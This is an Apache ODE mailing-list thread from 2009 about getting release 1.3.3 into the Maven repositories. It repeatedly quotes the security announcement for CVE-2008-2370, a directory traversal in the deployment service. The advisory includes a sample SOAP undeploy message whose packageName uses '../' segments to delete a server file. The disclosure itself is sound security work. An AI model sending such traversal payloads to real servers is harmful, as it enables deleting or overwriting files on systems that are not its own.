>> >
>>
>> For more information, check the Apache ODE website:
>> http://ode.apache.org/
>>
>> Apache ODE is an open source project released under a business-friendly
>> license (Apache License v2.0), as such we welcome your help and
>> contributions. To participate and get involved, our mailing lists are the
>> best resources to start from:
>> http://ode.apache.org/mailing-lists.html
>>
>> Thank you,
>> The Apache ODE Team
>>
>> ------
>>
>> CVE-2008-2370: Apache ODE information disclosure vulnerability
>>
>> Severity: Medium
>>
>> Vendor: The Apache Software Foundation
>>
>> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
>> 2.0-beta1 and 2.0-beta2 are also affected.
>>
>> Description: The process deployment web service was sensible to deployment
>> messages with forged names. Using a path for the name was allowing
>> directory
>> traversal, resulting in the potential writing of files under unwanted
>> locations (like a new WAR under a webapp deployment directory), the
>> overwriting of existing files or their deletion.
>>
>> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
>> obtain
>> the latest source from svn or apply the patch published under
>> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt<http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>
>> <http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>.
>>
>>
>> Example: Deleting a file /tmp/blabla using undeploy by sending the
>> following
>> message to the deployment service:
>>
>> <?xml version="1.0" encoding="UTF-8"?>
>> <soapenv:Envelope xmlns:soapenv="
>> http://schemas.xmlsoap.org/soap/envelope/"
>> xmlns:pmap="http://www.apache.org/ode/pmapi">
>> <soapenv:Header/>
>> <soapenv:Body>
>> <pmap:undeploy>
>>
>> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
>> </pmap:undeploy>
>> </soapenv:Body>
>> </soapenv:Envelope>
>> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>>
>
>
Re: No Apache ODE 1.3.3 in Maven repos
Posted by Matthieu Riou <ma...@gmail.com>.
On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
Mateusz.Nowakowski@sabre-holdings.com> wrote:
> Is it so difficult to populate the newest ODE to maven repos?
> :)
>
Ah sorry, it's not difficult, I just need some time to do it. Hopefully
later today.
Matthieu
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Thursday, August 13, 2009 10:22 AM
> To: dev@ode.apache.org; user@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>
> Any update on that?
>
> I'm trying to find for example ODE 1.3.3 here:
> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
> but the newest version is 1.3.2.
>
> --
> Regards
> Mateusz Nowakowski
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Tuesday, August 11, 2009 5:32 PM
> To: dev@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>
> Hi,
>
> I couldn't find ODE 1.3.3 in the main maven repository.
> Could you place it there?
>
> Thanks
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
> Of Matthieu Riou
> Sent: Saturday, August 08, 2009 6:41 AM
> To: security@apache.org; full-disclosure@lists.grok.org.uk;
> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
> Schoenefeld; announce@apache.org
> Subject: [ANNOUNCE] Apache ODE 1.3.3
>
> Hi,
>
> I'm pleased to announce the release of ODE 1.3.3, a security release of
> Apache ODE. It fixes a vulnerability in the process deployment that
> allowed,
> using a forged message, to create, overwrite or delete files on the server
> file system. See the full vulnerability announcement below.
>
> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
> organizes web services calls following a process description written in the
> BPEL XML grammar. Another way to describe it would be a web-service capable
> workflow engine.
>
> This new release also includes new features, bug fixes and improvements See
> the release notes for an exhaustive list for
> details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906>
>
> For more information, check the Apache ODE website:
> http://ode.apache.org/
>
> Apache ODE is an open source project released under a business-friendly
> license (Apache License v2.0), as such we welcome your help and
> contributions. To participate and get involved, our mailing lists are the
> best resources to start from:
> http://ode.apache.org/mailing-lists.html
>
> Thank you,
> The Apache ODE Team
>
> ------
>
> CVE-2008-2370: Apache ODE information disclosure vulnerability
>
> Severity: Medium
>
> Vendor: The Apache Software Foundation
>
> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
> 2.0-beta1 and 2.0-beta2 are also affected.
>
> Description: The process deployment web service was sensible to deployment
> messages with forged names. Using a path for the name was allowing
> directory
> traversal, resulting in the potential writing of files under unwanted
> locations (like a new WAR under a webapp deployment directory), the
> overwriting of existing files or their deletion.
>
> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
> obtain
> the latest source from svn or apply the patch published under
> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt<http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>
> <http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>.
>
>
> Example: Deleting a file /tmp/blabla using undeploy by sending the
> following
> message to the deployment service:
>
> <?xml version="1.0" encoding="UTF-8"?>
> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/
> "
> xmlns:pmap="http://www.apache.org/ode/pmapi">
> <soapenv:Header/>
> <soapenv:Body>
> <pmap:undeploy>
>
> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
> </pmap:undeploy>
> </soapenv:Body>
> </soapenv:Envelope>
> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>
Re: No Apache ODE 1.3.3 in Maven repos
Posted by Matthieu Riou <ma...@gmail.com>.
On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
Mateusz.Nowakowski@sabre-holdings.com> wrote:
> Is it so difficult to populate the newest ODE to maven repos?
> :)
>
Ah sorry, it's not difficult, I just need some time to do it. Hopefully
later today.
Matthieu
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Thursday, August 13, 2009 10:22 AM
> To: dev@ode.apache.org; user@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>
> Any update on that?
>
> I'm trying to find for example ODE 1.3.3 here:
> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
> but the newest version is 1.3.2.
>
> --
> Regards
> Mateusz Nowakowski
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Tuesday, August 11, 2009 5:32 PM
> To: dev@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>
> Hi,
>
> I couldn't find ODE 1.3.3 in the main maven repository.
> Could you place it there?
>
> Thanks
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
> Of Matthieu Riou
> Sent: Saturday, August 08, 2009 6:41 AM
> To: security@apache.org; full-disclosure@lists.grok.org.uk;
> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
> Schoenefeld; announce@apache.org
> Subject: [ANNOUNCE] Apache ODE 1.3.3
>
> Hi,
>
> I'm pleased to announce the release of ODE 1.3.3, a security release of
> Apache ODE. It fixes a vulnerability in the process deployment that
> allowed,
> using a forged message, to create, overwrite or delete files on the server
> file system. See the full vulnerability announcement below.
>
> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
> organizes web services calls following a process description written in the
> BPEL XML grammar. Another way to describe it would be a web-service capable
> workflow engine.
>
> This new release also includes new features, bug fixes and improvements See
> the release notes for an exhaustive list for
> details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906>
>
> For more information, check the Apache ODE website:
> http://ode.apache.org/
>
> Apache ODE is an open source project released under a business-friendly
> license (Apache License v2.0), as such we welcome your help and
> contributions. To participate and get involved, our mailing lists are the
> best resources to start from:
> http://ode.apache.org/mailing-lists.html
>
> Thank you,
> The Apache ODE Team
>
> ------
>
> CVE-2008-2370: Apache ODE information disclosure vulnerability
>
> Severity: Medium
>
> Vendor: The Apache Software Foundation
>
> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
> 2.0-beta1 and 2.0-beta2 are also affected.
>
> Description: The process deployment web service was sensible to deployment
> messages with forged names. Using a path for the name was allowing
> directory
> traversal, resulting in the potential writing of files under unwanted
> locations (like a new WAR under a webapp deployment directory), the
> overwriting of existing files or their deletion.
>
> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
> obtain
> the latest source from svn or apply the patch published under
> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt<http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>
> <http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>.
>
>
> Example: Deleting a file /tmp/blabla using undeploy by sending the
> following
> message to the deployment service:
>
> <?xml version="1.0" encoding="UTF-8"?>
> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/
> "
> xmlns:pmap="http://www.apache.org/ode/pmapi">
> <soapenv:Header/>
> <soapenv:Body>
> <pmap:undeploy>
>
> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
> </pmap:undeploy>
> </soapenv:Body>
> </soapenv:Envelope>
> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>